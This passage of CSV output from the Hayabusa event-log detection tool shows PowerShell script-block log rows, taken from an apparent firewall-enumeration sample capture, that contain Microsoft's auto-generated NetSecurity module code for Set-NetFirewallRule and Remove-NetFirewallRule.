= $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallRule' function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]]",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 
+00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, 